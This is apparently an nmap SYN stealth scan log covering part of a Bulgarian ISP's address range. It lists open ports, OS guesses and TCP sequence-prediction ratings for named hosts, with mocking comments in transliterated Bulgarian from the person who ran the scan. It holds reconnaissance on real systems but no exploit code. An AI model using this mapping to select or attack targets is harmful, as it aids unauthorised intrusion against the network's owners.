Interesting ports on nb.infotel.bg (212.39.64.29):
Port State Protocol Service
21 filtered tcp ftp
49 filtered tcp unknown
80 filtered tcp www
111 filtered tcp sunrpc
Remote OS guesses: Cisco 7513/3640 Router (IOS 11.2(14)P), Cisco 25XX/45XX Router or 29XX switch (IOS 11.2), IBM Stackable Hub
OS Fingerprint:
T5(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T6(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T7(Resp=Y%DF=N%W=0%ACK=O%Flags=AR%Ops=)
PU(Resp=N)
<[ I pak .....che te imat routeri kato spnet bre... a tova e predi okolo
godina ]>
Host unnamed.infotel.bg (212.39.64.30) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.64.31) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.64.31) seems to be a subnet broadcast address (returned 2 extra pings). Skipping host.
Host unnamed.infotel.bg (212.39.64.32) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.64.32) seems to be a subnet broadcast address (returned 2 extra pings). Skipping host.
Host unnamed.infotel.bg (212.39.64.33) appears to be up ... good.
Initiating SYN half-open stealth scan against unnamed.infotel.bg (212.39.64.33)
Adding TCP port 23 (state Open).
The SYN scan took 52 seconds to scan 120 ports.
For OSScan assuming that port 23 is open and port 39098 is closed and neither are firewalled
For OSScan assuming that port 23 is open and port 32997 is closed and neither are firewalled
For OSScan assuming that port 23 is open and port 30541 is closed and neither are firewalled
Interesting ports on unnamed.infotel.bg (212.39.64.33):
Port State Protocol Service
21 filtered tcp ftp
23 open tcp telnet
49 filtered tcp unknown
80 filtered tcp www
111 filtered tcp sunrpc
TCP Sequence Prediction: Class=trivial time dependency
Difficulty=4 (Trivial joke)
Sequence numbers: 639C176F 639C1AF3 639C1F0D 639C21C9 639C2647 639C2903
No OS matches for this host. TCP fingerprints:
TSeq(Class=TD%gcd=32%SI=7)
TSeq(Class=TD%gcd=32%SI=4)
T1(Resp=Y%DF=N%W=800%ACK=S++%Flags=AS%Ops=M)
T2(Resp=Y%DF=N%W=0%ACK=O%Flags=AR%Ops=)
T3(Resp=Y%DF=N%W=800%ACK=S++%Flags=AS%Ops=M)
T4(Resp=Y%DF=N%W=0%ACK=O%Flags=AR%Ops=)
T5(Resp=Y%DF=N%W=0%ACK=O%Flags=AR%Ops=)
T6(Resp=Y%DF=N%W=0%ACK=O%Flags=AR%Ops=)
T6(Resp=N)
T7(Resp=Y%DF=N%W=0%ACK=O%Flags=AR%Ops=)
PU(Resp=Y%DF=N%TOS=0%IPLEN=54%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULEN=134%DAT=F)
<[ breh...tova trqbvq da se proveri... ]>
Host unnamed.infotel.bg (212.39.64.34) appears to be up ... good.
Initiating SYN half-open stealth scan against unnamed.infotel.bg (212.39.64.34)
Adding TCP port 9 (state Open).
Adding TCP port 79 (state Open).
Adding TCP port 19 (state Open).
Adding TCP port 7 (state Open).
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
Adding TCP port 23 (state Open).
Bumping up senddelay by 10000 (to 10000), due to excessive drops
The SYN scan took 247 seconds to scan 120 ports.
For OSScan assuming that port 7 is open and port 36334 is closed and neither are firewalled
Insufficient responses for TCP sequencing (2), OS detection will be MUCH less reliable
For OSScan assuming that port 7 is open and port 36542 is closed and neither are firewalled
For OSScan assuming that port 7 is open and port 31882 is closed and neither are firewalled
Insufficient responses for TCP sequencing (3), OS detection will be MUCH less reliable
Interesting ports on unnamed.infotel.bg (212.39.64.34):
Port State Protocol Service
7 open tcp echo
9 open tcp discard
19 open tcp chargen
21 filtered tcp ftp
23 open tcp telnet
49 filtered tcp unknown
79 open tcp finger
80 filtered tcp www
111 filtered tcp sunrpc
No OS matches for this host. TCP fingerprints:
T1(Resp=Y%DF=N%W=860%ACK=S++%Flags=AS%Ops=M)
TSeq(Class=C%Val=68D83FAF)
T1(Resp=Y%DF=N%W=860%ACK=S++%Flags=AS%Ops=M)
T2(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
T1(Resp=N)
T2(Resp=Y%DF=N%W=0%ACK=O%Flags=AR%Ops=)
T3(Resp=N)
T2(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
T3(Resp=N)
T4(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T3(Resp=N)
T4(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T5(Resp=N)
T4(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T5(Resp=N)
T6(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T5(Resp=N)
T6(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T7(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
T6(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T7(Resp=Y%DF=N%W=0%ACK=O%Flags=AR%Ops=)
PU(Resp=Y%DF=N%TOS=0%IPLEN=38%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULEN=134%DAT=E)
T7(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
PU(Resp=Y%DF=N%TOS=0%IPLEN=38%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULEN=134%DAT=E)
PU(Resp=Y%DF=N%TOS=0%IPLEN=38%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULEN=134%DAT=E)
Host unnamed.infotel.bg (212.39.64.35) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.64.35) seems to be a subnet broadcast address (returned 2 extra pings). Skipping host.
Host unnamed.infotel.bg (212.39.64.36) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.64.48) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.64.48) seems to be a subnet broadcast address (returned 2 extra pings). Skipping host.
Host unnamed.infotel.bg (212.39.64.49) appears to be up ... good.
Initiating SYN half-open stealth scan against unnamed.infotel.bg (212.39.64.49)
Adding TCP port 15 (state Open).
Adding TCP port 109 (state Open).
Adding TCP port 9 (state Open).
Adding TCP port 13 (state Open).
Adding TCP port 25 (state Open).
Adding TCP port 7 (state Open).
Adding TCP port 11 (state Open).
Adding TCP port 37 (state Open).
Adding TCP port 23 (state Open).
Adding TCP port 79 (state Open).
Adding TCP port 119 (state Open).
Adding TCP port 19 (state Open).
Adding TCP port 110 (state Open).
Adding TCP port 113 (state Open).
The SYN scan took 59 seconds to scan 120 ports.
For OSScan assuming that port 7 is open and port 43035 is closed and neither are firewalled
WARNING: RST from port 7 -- is this port really open?
WARNING: RST from port 7 -- is this port really open?
WARNING: RST from port 7 -- is this port really open?
WARNING: RST from port 7 -- is this port really open?
WARNING: RST from port 7 -- is this port really open?
WARNING: RST from port 7 -- is this port really open?
<[ Interesno...dali e firewallnata po nqkakuv gaden nachin ? ]> Insufficient
responses for TCP sequencing (0), OS detection will be MUCH less reliable
For OSScan assuming that port 7 is open and port 44543 is closed and neither
are firewalled
WARNING: RST from port 7 -- is this port really open?
WARNING: RST from port 7 -- is this port really open?
WARNING: RST from port 7 -- is this port really open?
WARNING: RST from port 7 -- is this port really open?
WARNING: RST from port 7 -- is this port really open?
WARNING: RST from port 7 -- is this port really open?
Insufficient responses for TCP sequencing (0), OS detection will be MUCH less reliable
For OSScan assuming that port 7 is open and port 38888 is closed and neither are firewalled
WARNING: RST from port 7 -- is this port really open?
WARNING: RST from port 7 -- is this port really open?
WARNING: RST from port 7 -- is this port really open?
WARNING: RST from port 7 -- is this port really open?
WARNING: RST from port 7 -- is this port really open?
WARNING: RST from port 7 -- is this port really open?
Insufficient responses for TCP sequencing (0), OS detection will be MUCH less reliable
Interesting ports on unnamed.infotel.bg (212.39.64.49):
Port State Protocol Service
7 open tcp echo
9 open tcp discard
11 open tcp systat
13 open tcp daytime
15 open tcp netstat
19 open tcp chargen
21 filtered tcp ftp
23 open tcp telnet
25 open tcp smtp
37 open tcp time
49 filtered tcp unknown
79 open tcp finger
80 filtered tcp www
109 open tcp pop2
110 open tcp pop3
111 filtered tcp sunrpc
113 open tcp auth
119 open tcp nntp
No OS matches for this host. TCP fingerprints:
T1(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T2(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
T3(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T4(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T5(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T6(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T7(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
T7(Resp=N)
T7(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
PU(Resp=Y%DF=N%TOS=0%IPLEN=38%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULEN=134%DAT=E)
Host unnamed.infotel.bg (212.39.64.50) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.64.51) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.64.52) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.64.53) appears to be up ... good.
Initiating SYN half-open stealth scan against unnamed.infotel.bg (212.39.64.53)
The SYN scan took 62 seconds to scan 120 ports.
Warning: No ports found open on this machine, OS detection will be MUCH less reliable
Interesting ports on unnamed.infotel.bg (212.39.64.53):
Port State Protocol Service
21 filtered tcp ftp
49 filtered tcp unknown
80 filtered tcp www
111 filtered tcp sunrpc
Remote OS guesses: Windows NT4 / Win95 / Win98, Windows NT 5 Beta2
OS Fingerprint:
T5(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T6(Resp=Y%DF=N%W=0%ACK=S++%Flags=R%Ops=)
T7(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
PU(Resp=Y%DF=N%TOS=0%IPLEN=38%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULEN=134%DAT=E)
<[ Qaaaaa vkluchena winboza .... (scan-a vurvi posred nosht vse pak ...]>
Host unnamed.infotel.bg (212.39.64.54) appears to be up ... good.
Initiating SYN half-open stealth scan against unnamed.infotel.bg (212.39.64.54)
The SYN scan took 66 seconds to scan 120 ports.
Warning: No ports found open on this machine, OS detection will be MUCH less reliable
Interesting ports on unnamed.infotel.bg (212.39.64.54):
Port State Protocol Service
21 filtered tcp ftp
49 filtered tcp unknown
80 filtered tcp www
111 filtered tcp sunrpc
Remote OS guesses: Windows NT4 / Win95 / Win98, Windows NT 5 Beta2
OS Fingerprint:
T5(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T6(Resp=Y%DF=N%W=0%ACK=S++%Flags=R%Ops=)
T7(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
PU(Resp=Y%DF=N%TOS=0%IPLEN=38%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULEN=134%DAT=E)
Host unnamed.infotel.bg (212.39.64.55) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.64.56) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.64.57) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.64.58) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.64.59) appears to be up ... good.
Initiating SYN half-open stealth scan against unnamed.infotel.bg (212.39.64.59)
The SYN scan took 94 seconds to scan 120 ports.
Warning: No ports found open on this machine, OS detection will be MUCH less reliable
Interesting ports on unnamed.infotel.bg (212.39.64.59):
Port State Protocol Service
21 filtered tcp ftp
49 filtered tcp unknown
80 filtered tcp www
111 filtered tcp sunrpc
Remote OS guesses: Windows NT4 / Win95 / Win98, Windows NT 5 Beta2
OS Fingerprint:
T5(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T6(Resp=Y%DF=N%W=0%ACK=S++%Flags=R%Ops=)
T7(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
PU(Resp=Y%DF=N%TOS=0%IPLEN=38%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULEN=134%DAT=E)
<[ stavat 3 windows-a ... :))) ]>
Host unnamed.infotel.bg (212.39.64.60) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.64.61) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.64.62) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.64.63) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.64.63) seems to be a subnet broadcast address (returned 1 extra pings). Skipping host.
Host unnamed.infotel.bg (212.39.64.64) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.64.97) appears to be up ... good.
Initiating SYN half-open stealth scan against unnamed.infotel.bg (212.39.64.97)
The SYN scan took 13 seconds to scan 120 ports.
Warning: No ports found open on this machine, OS detection will be MUCH less reliable
Warning: No ports found open on this machine, OS detection will be MUCH less reliable
Warning: No ports found open on this machine, OS detection will be MUCH less reliable
Interesting ports on unnamed.infotel.bg (212.39.64.97):
Port State Protocol Service
21 filtered tcp ftp
49 filtered tcp unknown
80 filtered tcp www
111 filtered tcp sunrpc
No OS matches for this host. TCP fingerprints:
T5(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T6(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
T7(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
PU(Resp=Y%DF=N%TOS=0%IPLEN=124%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULEN=134%DAT=E)
Host unnamed.infotel.bg (212.39.64.98) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.64.99) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.64.100) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.64.100) seems to be a subnet broadcast address (returned 1 extra pings). Skipping host.
Host unnamed.infotel.bg (212.39.64.101) appears to be up ... good.
Initiating SYN half-open stealth scan against unnamed.infotel.bg (212.39.64.101)
Adding TCP port 23 (state Open).
Adding TCP port 79 (state Open).
The SYN scan took 13 seconds to scan 120 ports.
For OSScan assuming that port 23 is open and port 38738 is closed and neither are firewalled
For OSScan assuming that port 23 is open and port 42856 is closed and neither are firewalled
Interesting ports on unnamed.infotel.bg (212.39.64.101):
Port State Protocol Service
21 filtered tcp ftp
23 open tcp telnet
49 filtered tcp unknown
79 open tcp finger
80 filtered tcp www
111 filtered tcp sunrpc
TCP Sequence Prediction: Class=random positive increments
Difficulty=14515 (Worthy challenge)
Sequence numbers: DF84CA76 DF8E789F DF9892F2 DFA29F68 DFAC9053 DFB6ECB6
Remote operating system guess: Cisco 25XX/45XX Router or 29XX switch (IOS 11.2)
OS Fingerprint:
TSeq(Class=RI%gcd=1%SI=38B3)
T1(Resp=Y%DF=N%W=10C0%ACK=S++%Flags=AS%Ops=M)
T2(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
T3(Resp=Y%DF=N%W=10C0%ACK=S++%Flags=AS%Ops=M)
T4(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T5(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T6(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T7(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
PU(Resp=N)
Host unnamed.infotel.bg (212.39.64.102) appears to be up ... good.
Initiating SYN half-open stealth scan against unnamed.infotel.bg (212.39.64.102)
The SYN scan took 10 seconds to scan 120 ports.
Warning: No ports found open on this machine, OS detection will be MUCH less reliable
Warning: No ports found open on this machine, OS detection will be MUCH less reliable
Warning: No ports found open on this machine, OS detection will be MUCH less reliable
Interesting ports on unnamed.infotel.bg (212.39.64.102):
Port State Protocol Service
21 filtered tcp ftp
49 filtered tcp unknown
80 filtered tcp www
111 filtered tcp sunrpc
No OS matches for this host. TCP fingerprints:
T5(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T6(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
T7(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
PU(Resp=Y%DF=N%TOS=0%IPLEN=124%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULEN=134%DAT=E)
Host unnamed.infotel.bg (212.39.64.103) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.64.103) seems to be a subnet broadcast address (returned 1 extra pings). Skipping host.
Host unnamed.infotel.bg (212.39.64.104) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.64.112) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.64.112) seems to be a subnet broadcast address (returned 1 extra pings). Skipping host.
Host unnamed.infotel.bg (212.39.64.113) appears to be up ... good.
Initiating SYN half-open stealth scan against unnamed.infotel.bg (212.39.64.113)
The SYN scan took 22 seconds to scan 120 ports.
Warning: No ports found open on this machine, OS detection will be MUCH less reliable
Warning: No ports found open on this machine, OS detection will be MUCH less reliable
Interesting ports on unnamed.infotel.bg (212.39.64.113):
Port State Protocol Service
21 filtered tcp ftp
49 filtered tcp unknown
80 filtered tcp www
111 filtered tcp sunrpc
Remote OS guesses: Cisco 7513/3640 Router (IOS 11.2(14)P), Cisco 25XX/45XX Router or 29XX switch (IOS 11.2), IBM Stackable Hub
OS Fingerprint:
T5(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T6(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T7(Resp=Y%DF=N%W=0%ACK=O%Flags=AR%Ops=)
PU(Resp=N)
Host unnamed.infotel.bg (212.39.64.114) appears to be up ... good.
Initiating SYN half-open stealth scan against unnamed.infotel.bg (212.39.64.114)
The SYN scan took 397 seconds to scan 120 ports.
Warning: No ports found open on this machine, OS detection will be MUCH less reliable
Warning: No ports found open on this machine, OS detection will be MUCH less reliable
Warning: No ports found open on this machine, OS detection will be MUCH less reliable
Interesting ports on unnamed.infotel.bg (212.39.64.114):
(Not showing ports in state: filtered)
Port State Protocol Service
No OS matches for this host. TCP fingerprints:
T5(Resp=N)
T6(Resp=N)
T7(Resp=N)
PU(Resp=N)
Host unnamed.infotel.bg (212.39.64.115) appears to be down, skipping it.
Host vg.infotel.bg (212.39.64.116) appears to be up ... good.
Initiating SYN half-open stealth scan against vg.infotel.bg (212.39.64.116)
Adding TCP port 23 (state Open).
The SYN scan took 15 seconds to scan 120 ports.
For OSScan assuming that port 23 is open and port 40117 is closed and neither are firewalled
For OSScan assuming that port 23 is open and port 42484 is closed and neither are firewalled
For OSScan assuming that port 23 is open and port 38558 is closed and neither are firewalled
Interesting ports on vg.infotel.bg (212.39.64.116):
Port State Protocol Service
21 filtered tcp ftp
23 open tcp telnet
49 filtered tcp unknown
80 filtered tcp www
111 filtered tcp sunrpc
TCP Sequence Prediction: Class=trivial time dependency
Difficulty=13 (Easy)
Sequence numbers: 63B2ECBF 63B2ECBF 63B2F29B 63B2F4C1 63B2F7E1 63B2FEE9
No OS matches for this host. TCP fingerprints:
TSeq(Class=TD%gcd=32%SI=D)
TSeq(Class=TD%gcd=32%SI=3)
TSeq(Class=TD%gcd=32%SI=D)
T1(Resp=Y%DF=N%W=800%ACK=S++%Flags=AS%Ops=M)
T2(Resp=Y%DF=N%W=0%ACK=O%Flags=AR%Ops=)
T3(Resp=Y%DF=N%W=800%ACK=S++%Flags=AS%Ops=M)
T4(Resp=Y%DF=N%W=0%ACK=O%Flags=AR%Ops=)
T5(Resp=Y%DF=N%W=0%ACK=O%Flags=AR%Ops=)
T5(Resp=N)
T5(Resp=Y%DF=N%W=0%ACK=O%Flags=AR%Ops=)
T6(Resp=Y%DF=N%W=0%ACK=O%Flags=AR%Ops=)
T7(Resp=Y%DF=N%W=0%ACK=O%Flags=AR%Ops=)
PU(Resp=Y%DF=N%TOS=0%IPLEN=54%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULEN=134%DAT=F)
Host unnamed.infotel.bg (212.39.64.117) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.64.127) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.64.127) seems to be a subnet broadcast address (returned 1 extra pings). Skipping host.
Host unnamed.infotel.bg (212.39.64.128) appears to be down, skipping it.
Host pomps.infotel.bg (212.39.64.129) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.64.130) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.64.131) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.64.132) appears to be up ... good.
Initiating SYN half-open stealth scan against unnamed.infotel.bg (212.39.64.132)
The SYN scan took 397 seconds to scan 120 ports.
Warning: No ports found open on this machine, OS detection will be MUCH less reliable
Warning: No ports found open on this machine, OS detection will be MUCH less reliable
Warning: No ports found open on this machine, OS detection will be MUCH less reliable
Interesting ports on unnamed.infotel.bg (212.39.64.132):
(Not showing ports in state: filtered)
Port State Protocol Service
No OS matches for this host. TCP fingerprints:
T5(Resp=N)
T6(Resp=N)
T7(Resp=N)
PU(Resp=N)
Host devact.infotel.bg (212.39.64.133) appears to be up ... good.
Initiating SYN half-open stealth scan against devact.infotel.bg (212.39.64.133)
The SYN scan took 398 seconds to scan 120 ports.
Warning: No ports found open on this machine, OS detection will be MUCH less reliable
Warning: No ports found open on this machine, OS detection will be MUCH less reliable
Warning: No ports found open on this machine, OS detection will be MUCH less reliable
Interesting ports on devact.infotel.bg (212.39.64.133):
(Not showing ports in state: filtered)
Port State Protocol Service
No OS matches for this host. TCP fingerprints:
T5(Resp=N)
T6(Resp=N)
T7(Resp=N)
PU(Resp=N)
Host devact-1.infotel.bg (212.39.64.134) appears to be up ... good.
Initiating SYN half-open stealth scan against devact-1.infotel.bg (212.39.64.134)
The SYN scan took 397 seconds to scan 120 ports.
Warning: No ports found open on this machine, OS detection will be MUCH less reliable
Warning: No ports found open on this machine, OS detection will be MUCH less reliable
Warning: No ports found open on this machine, OS detection will be MUCH less reliable
Interesting ports on devact-1.infotel.bg (212.39.64.134):
(Not showing ports in state: filtered)
Port State Protocol Service
No OS matches for this host. TCP fingerprints:
T5(Resp=N)
T6(Resp=N)
T7(Resp=N)
PU(Resp=N)
Host devact-2.infotel.bg (212.39.64.135) appears to be up ... good.
Initiating SYN half-open stealth scan against devact-2.infotel.bg (212.39.64.135)
The SYN scan took 397 seconds to scan 120 ports.
Warning: No ports found open on this machine, OS detection will be MUCH less reliable
Warning: No ports found open on this machine, OS detection will be MUCH less reliable
Warning: No ports found open on this machine, OS detection will be MUCH less reliable
Interesting ports on devact-2.infotel.bg (212.39.64.135):
(Not showing ports in state: filtered)
Port State Protocol Service
No OS matches for this host. TCP fingerprints:
T5(Resp=N)
T6(Resp=N)
T7(Resp=N)
PU(Resp=N)
Host unnamed.infotel.bg (212.39.64.136) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.64.160) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.64.160) seems to be a subnet broadcast address (returned 3 extra pings). Skipping host.
Host unnamed.infotel.bg (212.39.64.161) appears to be up ... good.
Initiating SYN half-open stealth scan against unnamed.infotel.bg (212.39.64.161)
<[ tuka sum izrqzal okolo 300 takiva raboti... Spored kay tova sa ICMP
unreachable ili nqkvi podobni bozi, ama ne moga da sum siguren, shtoto
togava sum spql :) ]>
Here it is:
3 1 E CA 0 0 0 0 45 0 0 28 74 ED 0 0
36 6 4D 4C C2 C EB C1 D4 27 40 A1 82 11 0 5
1C 6C 4F B2
Here it is:
3 1 E 5C 0 0 0 0 45 0 0 28 D2 88 0 0
36 6 EF B0 C2 C EB C1 D4 27 40 A1 82 11 0 73
1C 6C 4F B2
Here it is:
3 1 E 92 0 0 0 0 45 0 0 28 FF 49 0 0
36 6 C2 EF C2 C EB C1 D4 27 40 A1 82 11 0 3D
1C 6C 4F B2
Here it is:
3 1 E 70 0 0 0 0 45 0 0 28 3C 0 0 0
36 6 86 39 C2 C EB C1 D4 27 40 A1 82 11 0 5F
1C 6C 4F B2
The SYN scan took 397 seconds to scan 120 ports.
Warning: No ports found open on this machine, OS detection will be MUCH less reliable
Warning: No ports found open on this machine, OS detection will be MUCH less reliable
Warning: No ports found open on this machine, OS detection will be MUCH less reliable
Interesting ports on unnamed.infotel.bg (212.39.64.161):
(Not showing ports in state: filtered)
Port State Protocol Service
No OS matches for this host. TCP fingerprints:
T5(Resp=N)
T6(Resp=N)
T7(Resp=N)
PU(Resp=N)
<[ adski filtrirano ..... ]>
Host scifo.infotel.bg (212.39.64.162) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.64.163) appears to be down, skipping it.
Host dancho.infotel.bg (212.39.64.164) appears to be up ... good.
Initiating SYN half-open stealth scan against dancho.infotel.bg (212.39.64.164)
<[breee i taq li e tolkova filtrirana ? ]>
Here it is:
3 1 10 80 0 0 0 0 45 0 0 28 5 D3 0 0
36 6 BC 63 C2 C EB C1 D4 27 40 A4 82 11 0 3F
5C B5 D 79
The SYN scan took 397 seconds to scan 120 ports.
Warning: No ports found open on this machine, OS detection will be MUCH less reliable
Warning: No ports found open on this machine, OS detection will be MUCH less reliable
Warning: No ports found open on this machine, OS detection will be MUCH less reliable
Interesting ports on dancho.infotel.bg (212.39.64.164):
(Not showing ports in state: filtered)
Port State Protocol Service
No OS matches for this host. TCP fingerprints:
T5(Resp=N)
T6(Resp=N)
T7(Resp=N)
PU(Resp=N)
Host unnamed.infotel.bg (212.39.64.165) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.64.166) appears to be up ... good.
Initiating SYN half-open stealth scan against unnamed.infotel.bg (212.39.64.166)
3 1 4A DC 0 0 0 0 45 0 0 28 F9 67 0 0
36 6 C8 CC C2 C EB C1 D4 27 40 A6 82 11 0 3D
DE 87 51 4C
The SYN scan took 397 seconds to scan 120 ports.
Warning: No ports found open on this machine, OS detection will be MUCH less reliable
Warning: No ports found open on this machine, OS detection will be MUCH less reliable
Warning: No ports found open on this machine, OS detection will be MUCH less reliable
Interesting ports on unnamed.infotel.bg (212.39.64.166):
(Not showing ports in state: filtered)
Port State Protocol Service
No OS matches for this host. TCP fingerprints:
T5(Resp=N)
T6(Resp=N)
T7(Resp=N)
PU(Resp=N)
Host unnamed.infotel.bg (212.39.64.167) appears to be up ... good.
Initiating SYN half-open stealth scan against unnamed.infotel.bg (212.39.64.167)
Here it is:
Here it is:
3 1 1C 97 0 0 0 0 45 0 0 28 12 32 0 0
36 6 B0 1 C2 C EB C1 D4 27 40 A7 82 11 0 5F
59 E0 4 17
The SYN scan took 397 seconds to scan 120 ports.
Warning: No ports found open on this machine, OS detection will be MUCH less reliable
Warning: No ports found open on this machine, OS detection will be MUCH less reliable
Warning: No ports found open on this machine, OS detection will be MUCH less reliable
Interesting ports on unnamed.infotel.bg (212.39.64.167):
(Not showing ports in state: filtered)
Port State Protocol Service
No OS matches for this host. TCP fingerprints:
T5(Resp=N)
T6(Resp=N)
T7(Resp=N)
PU(Resp=N)
Host unnamed.infotel.bg (212.39.64.168) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.64.184) appears to be down, skipping it.
Host hpns.infotel.bg (212.39.64.185) appears to be up ... good.
Initiating SYN half-open stealth scan against hpns.infotel.bg (212.39.64.185)
Here it is:
3 1 7D A6 0 0 0 0 45 0 0 28 C2 D0 0 0
36 6 FF 50 C2 C EB C1 D4 27 40 B9 82 11 0 3D
72 69 8A A0
The SYN scan took 398 seconds to scan 120 ports.
Warning: No ports found open on this machine, OS detection will be MUCH less reliable
Warning: No ports found open on this machine, OS detection will be MUCH less reliable
Warning: No ports found open on this machine, OS detection will be MUCH less reliable
Interesting ports on hpns.infotel.bg (212.39.64.185):
(Not showing ports in state: filtered)
Port State Protocol Service
No OS matches for this host. TCP fingerprints:
T5(Resp=N)
T6(Resp=N)
T7(Resp=N)
PU(Resp=N)
Host unnamed.infotel.bg (212.39.64.186) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.64.191) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.64.191) seems to be a subnet broadcast address (returned 2 extra pings). Skipping host.
Host unnamed.infotel.bg (212.39.64.192) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.64.208) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.64.208) seems to be a subnet broadcast address (returned 2 extra pings). Skipping host.
Host unnamed.infotel.bg (212.39.64.209) appears to be up ... good.
Initiating SYN half-open stealth scan against unnamed.infotel.bg (212.39.64.209)
Adding TCP port 23 (state Open).
The SYN scan took 10 seconds to scan 120 ports.
For OSScan assuming that port 23 is open and port 36989 is closed and neither are firewalled
For OSScan assuming that port 23 is open and port 43884 is closed and neither are firewalled
For OSScan assuming that port 23 is open and port 35286 is closed and neither are firewalled
Interesting ports on unnamed.infotel.bg (212.39.64.209):
Port State Protocol Service
21 filtered tcp ftp
23 open tcp telnet
49 filtered tcp unknown
80 filtered tcp www
111 filtered tcp sunrpc
TCP Sequence Prediction: Class=trivial time dependency
Difficulty=1 (Trivial joke)
Sequence numbers: 63F21039 63F2138B 63F21615 63F218D1 63F21B8D 63F21E7B
No OS matches for this host. TCP fingerprints:
TSeq(Class=TD%gcd=32%SI=1)
TSeq(Class=TD%gcd=32%SI=6)
TSeq(Class=TD%gcd=32%SI=1)
T1(Resp=Y%DF=N%W=800%ACK=S++%Flags=AS%Ops=M)
T2(Resp=Y%DF=N%W=0%ACK=O%Flags=AR%Ops=)
T3(Resp=Y%DF=N%W=800%ACK=S++%Flags=AS%Ops=M)
T4(Resp=Y%DF=N%W=0%ACK=O%Flags=AR%Ops=)
T5(Resp=Y%DF=N%W=0%ACK=O%Flags=AR%Ops=)
T6(Resp=Y%DF=N%W=0%ACK=O%Flags=AR%Ops=)
T7(Resp=Y%DF=N%W=0%ACK=O%Flags=AR%Ops=)
